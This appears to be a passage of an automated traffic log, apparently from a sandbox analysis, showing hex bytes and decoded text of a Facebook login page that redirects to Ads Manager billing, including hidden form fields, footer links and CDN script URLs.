                                                                                                                2022-10-13 11:08:15 UTC4873INData Raw: 50 72 6a 6f 75 78 72 77 66 76 6b 77 36 22 2c 22 74 72 61 6e 73 69 74 69 6f 6e 5f 69 64 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 7d 2c 35 38 38 38 5d 2c 5b 22 63 72 3a 36 38 36 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 33 74 56 63 59 64 31 63 6b 65 79 43 72 6e 4a 31 31 6f 37 57 6f 54 56 45 61 43 55 32 76 63 48 61 38 74 41 47 75 58 4a 30 30 51 4d 49 4b 37 66 47 65 51 4c 76 74 67 42 2d 45 46 2d 6e 79 46 59 59 55 59 61 31 6d 70 59 30 57 42 37 4a 4a 62 74 7a 41 31 79 44 55 54 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 39 38 34 30 38 31 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 30 66 59 79 30 72 6a 70 61 72 66 66 4f 69 50 63 33 78 53 45 4d 36 41 6e 47 7a 5f 72 33 63 65 63 66 56 77 37 6e 6f 6d 49 6f 46 37 48 41
                                                                                                                Data Ascii: Prjouxrwfvkw6","transition_id":0,"version":6},5888],["cr:686",[],{"__rc":[null,"Aa3tVcYd1ckeyCrnJ11o7WoTVEaCU2vcHa8tAGuXJ00QMIK7fGeQLvtgB-EF-nyFYYUYa1mpY0WB7JJbtzA1yDUT"]},-1],["cr:1984081",[],{"__rc":[null,"Aa0fYy0rjparffOiPc3xSEM6AnGz_r3cecfVw7nomIoF7HA
                                                                                                                2022-10-13 11:08:15 UTC4875INData Raw: 22 3e 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22 74 72 61 63 6b 69 6e 67 5f 70 69 78 65 6c 22 20 2f 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 75 66 66 69 6e 5f 74 72 61 63 6b 69 6e 67 5f 70 69 78 65 6c 5f 65 6e 64 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 32 70 69 6f 20 5f 31 75 78 75 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 38 35 6e 22 20 69 64 3d 22 75 5f 30 5f 31 5f 52 50 22 3e 3c 69 20 63 6c 61 73 73 3d 22 5f 35 38 35 70 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 62 62 38 30 37 35 22 3e 3c 75 3e 4e 6f 74 69 63 65 3c 2f 75 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 38 35 72 20 5f 35 30 66 34 22 3e 59 6f 75 20 6d 75 73 74 20 6c 6f 67 20 69 6e 20 74 6f 20 63 6f 6e 74
                                                                                                                Data Ascii: "></span><img class="tracking_pixel" /><span class="muffin_tracking_pixel_end"></span><div class="_2pio _1uxu"><div class="_585n" id="u_0_1_RP"><i class="_585p img sp_ot1t5YjYL3s sx_bb8075"><u>Notice</u></i><div class="_585r _50f4">You must log in to cont
                                                                                                                2022-10-13 11:08:15 UTC4876INData Raw: 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 32 5f 38 48 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 75 68 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 34 30 38 31 35 5f 59 32 49 48 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e
                                                                                                                Data Ascii: " autocomplete="off" name="timezone" value="" id="u_0_2_8H" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_3_uh" /><input type="hidden" name="lgnrnd" value="040815_Y2IH" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" />
                                                                                                                2022-10-13 11:08:15 UTC4878INData Raw: 6f 77 22 20 63 6c 61 73 73 3d 22 5f 39 37 77 35 22 3e 53 69 67 6e 20 75 70 20 66 6f 72 20 46 61 63 65 62 6f 6f 6b 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 63 6f 6e 74 61 63 74 5f 70 6f 69 6e 74 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 63 6f 6e 74 61 63 74 5f 70 6f 69 6e 74 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 6e 61 6d 65 3d 22 70 72 65 66 69 6c 6c 5f 73 6f 75 72 63 65 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70
                                                                                                                Data Ascii: ow" class="_97w5">Sign up for Facebook</a></div></div><input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" value="" /><input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /><input typ
                                                                                                                2022-10-13 11:08:15 UTC4879INData Raw: 6c 43 6f 6f 6b 69 65 52 65 6c 6f 61 64 3d 21 31 2c 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 65 66 6f 72 65 75 6e 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 5f 63 61 6e 63 65 6c 43 6f 6f 6b 69 65 52 65 6c 6f 61 64 3d 21 30 7d 29 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 35 6b 65 20 5f 38 6f 70 79 22 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 6f 6f 74 65 72 22 20 64 61 74 61 2d 72 65 66 65 72 72 65 72 3d 22 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 70 61 67 65 5f 66 6f 6f 74 65 72 22 3e 3c 75 6c 20 63 6c 61 73
                                                                                                                Data Ascii: lCookieReload=!1,window.addEventListener("beforeunload",function(){window.__cancelCookieReload=!0})}</script></div></div></div></div><div class=""><div class="_95ke _8opy"><div id="pageFooter" data-referrer="page_footer" data-testid="page_footer"><ul clas
                                                                                                                2022-10-13 11:08:15 UTC4881INData Raw: 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f
                                                                                                                Data Ascii: ww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.faceboo
                                                                                                                2022-10-13 11:08:15 UTC4882INData Raw: 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 2d 6c 61 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 65 73 5f 4c 41 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c
                                                                                                                Data Ascii: 4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\
                                                                                                                2022-10-13 11:08:15 UTC4884INData Raw: 20 74 69 74 6c 65 3d 22 41 72 61 62 69 63 22 3e d8 a7 d9 84 d8 b9 d8 b1 d8 a8 d9 8a d8 a9 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61
                                                                                                                Data Ascii: title="Arabic"></a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLoca
                                                                                                                2022-10-13 11:08:15 UTC4885INData Raw: 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 6f 6f 74 65 72 43 68 69 6c 64 72 65 6e 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 46 61 63 65 62 6f 6f 6b 20 73 69 74 65 20 6c 69 6e 6b 73 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 75 69 4c 69 73 74 20 70 61 67 65 46 6f 6f 74 65 72 4c 69 6e 6b 4c 69 73 74 20 5f 35 30 39 2d 20 5f 34 6b 69 20 5f 37 30 33 20 5f 36 2d 69 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 72 65 67 2f 22 20 74 69 74 6c 65 3d 22 53 69 67 6e 20 55 70 20 66 6f 72 20 46 61 63 65 62 6f 6f 6b 22 3e 53 69 67 6e 20 55 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e
                                                                                                                Data Ascii: l><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login
                                                                                                                2022-10-13 11:08:15 UTC4887INData Raw: 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 74 69 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 63 61 6c 2f 6c 69 73 74 73 2f 32 34 35 30 31 39 38 37 32 36 36 36 31 30 34 2f 22 20 74 69 74 6c 65 3d 22 42 72 6f 77 73 65 20 6f 75 72 20 4c 6f 63 61 6c 20 4c 69 73 74 73 20 64 69 72 65 63 74 6f 72 79 2e 22 3e 4c 6f 63 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 66 75 6e 64 72 61 69 73 65 72 73 2f 22 20 74 69 74 6c 65 3d 22 44 6f 6e 61 74 65 20 74 6f 20 77 6f 72 74 68 79 20 63 61 75 73 65 73 2e 22 3e 46 75 6e 64 72 61 69 73 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e
                                                                                                                Data Ascii: bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li>
                                                                                                                2022-10-13 11:08:15 UTC4888INData Raw: 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 64 20 43 68 6f 69 63 65 73 2e 22 3e 41 64 20 63 68 6f 69 63 65 73 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 30 38 61 30 66 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 39 22 20 74 69 74 6c 65 3d 22 52 65 76 69 65 77 20 6f 75 72 20 74 65 72 6d 73 20 61 6e 64 20 70 6f 6c 69 63 69 65 73 2e 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c
                                                                                                                Data Ascii: ww.facebook.com/help/568137493302217" title="Learn about Ad Choices.">Ad choices<i class="img sp_ot1t5YjYL3s sx_708a0f"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Review our terms and policies.">Terms</a></li><li><
                                                                                                                2022-10-13 11:08:15 UTC4889INData Raw: 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 76 57 38 36 64 32 75 4a 2d 6b 58 50 39 43 6b 22 7d 2c 22 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 4d 64 78 66 4f 4d 68 4d 51 59 63 7a 30 79 56 63 22 7d 2c 22 36 38 36 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 38 6f 66 70 63 53 70 37 43 41 7a 4d 64 73 46 45 22 7d 2c 22 37 32 39 36 33 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 62 30 74 6a 38 41 48 57 47 35 6c 54 46 43 52 38 22 7d 2c 22 31 32 38 31 35 30 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 50 48 5a 4d 39 67 46 6f 79 70 43 6a 51 79 55
                                                                                                                Data Ascii: result":false,"hash":"AT66vW86d2uJ-kXP9Ck"},"12":{"result":false,"hash":"AT7MdxfOMhMQYcz0yVc"},"6862":{"result":false,"hash":"AT68ofpcSp7CAzMdsFE"},"729631":{"result":false,"hash":"AT7b0tj8AHWG5lTFCR8"},"1281505":{"result":false,"hash":"AT4PHZM9gFoypCjQyU
                                                                                                                2022-10-13 11:08:15 UTC4891INData Raw: 2e 70 68 70 5c 2f 76 33 69 4a 66 58 34 5c 2f 79 4c 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 30 6c 71 72 76 7a 78 32 77 62 41 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 38 7a 62 45 5a 74 75 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 75 5c 2f 72 5c 2f 47 37 36 73 51 59 38 30 73 33 37 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 78 32 6c 72 47 41 57 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69
                                                                                                                Data Ascii: .php\/v3iJfX4\/yL\/l\/en_US\/0lqrvzx2wbA.js?_nc_x=Ij3Wp8lg5Kz"},"8zbEZtu":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yu\/r\/G76sQY80s37.js?_nc_x=Ij3Wp8lg5Kz"},"x2lrGAW":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i
                                                                                                                2022-10-13 11:08:15 UTC4892INData Raw: 39 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 72 5c 2f 31 6f 43 56 75 4f 2d 47 4b 56 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 70 73 43 34 43 70 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4b 5c 2f 72 5c 2f 7a 4c 55 6e 41 56 70 78 6b 73 5a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 32 5c 2f 6d 61 51 5c 2f 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72
                                                                                                                Data Ascii: 9":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/1oCVuO-GKV8.js?_nc_x=Ij3Wp8lg5Kz"},"psC4Cpw":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yK\/r\/zLUnAVpxksZ.js?_nc_x=Ij3Wp8lg5Kz"},"2\/maQ\/Q":{"type":"js","sr
                                                                                                                2022-10-13 11:08:15 UTC4894INData Raw: 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 34 75 4c 5a 6c 51 50 70 56 74 70 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 79 53 65 57 37 48 67 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 72 5c 2f 41 54 63 75 30 58 67 55 44 66 50 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 5a 45 43 34 52 72 51 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 53 5c 2f 72 5c 2f 6e 48
                                                                                                                Data Ascii: rc.php\/v3\/yg\/r\/4uLZlQPpVtp.js?_nc_x=Ij3Wp8lg5Kz"},"ySeW7Hg":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/ATcu0XgUDfP.js?_nc_x=Ij3Wp8lg5Kz"},"ZEC4RrQ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yS\/r\/nH
                                                                                                                2022-10-13 11:08:15 UTC4895INData Raw: 72 6f 73 73 5c 2f 5a 78 77 67 37 6b 77 70 43 31 78 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6d 52 70 44 77 6d 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34 5c 2f 72 5c 2f 56 52 4b 79 57 79 69 6a 4e 42 39 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6e 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 6c 68 59
                                                                                                                Data Ascii: ross\/Zxwg7kwpC1x.css?_nc_x=Ij3Wp8lg5Kz"},"mRpDwmd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/VRKyWyijNB9.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/l\/0,cross\/lhY
                                                                                                                2022-10-13 11:08:15 UTC4897INData Raw: 30 62 4e 72 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 64 42 71 34 5c 2f 79 30 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6e 57 61 37 42 67 4c 32 6a 45 74 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 64 4b 41 4c 64 4e 35 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 7a 46 68 46 2d 66 33 6c 41 48 39 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69
                                                                                                                Data Ascii: 0bNr":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3idBq4\/y0\/l\/en_US\/nWa7BgL2jEt.js?_nc_x=Ij3Wp8lg5Kz"},"dKALdN5":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/l\/0,cross\/zFhF-f3lAH9.css?_nc_x=Ij3Wp8lg5Kz"},"i
                                                                                                                2022-10-13 11:08:15 UTC4898INData Raw: 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 72 5c 2f 34 6d 39 38 49 45 6e 37 39 48 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 47 70 51 46 42 77 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 73 5c 2f 72 5c 2f 42 31 51 6b 79 47 76 55 33 70 64 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 4d 61 77 6d 56 4a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c
                                                                                                                Data Ascii: js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/4m98IEn79HU.js?_nc_x=Ij3Wp8lg5Kz"},"GpQFBwL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/r\/B1QkyGvU3pd.js?_nc_x=Ij3Wp8lg5Kz"},"iMawmVJ":{"type":"css","src":"https:\/\
                                                                                                                2022-10-13 11:08:15 UTC4900INData Raw: 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 50 5c 2f 72 5c 2f 30 66 33 4f 58 76 55 46 49 59 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 53 77 54 73 57 68 64 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 59 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 4b 76 52 49 73 69 6f 74 68 73 4b 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 45 48 79 38 78 56 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 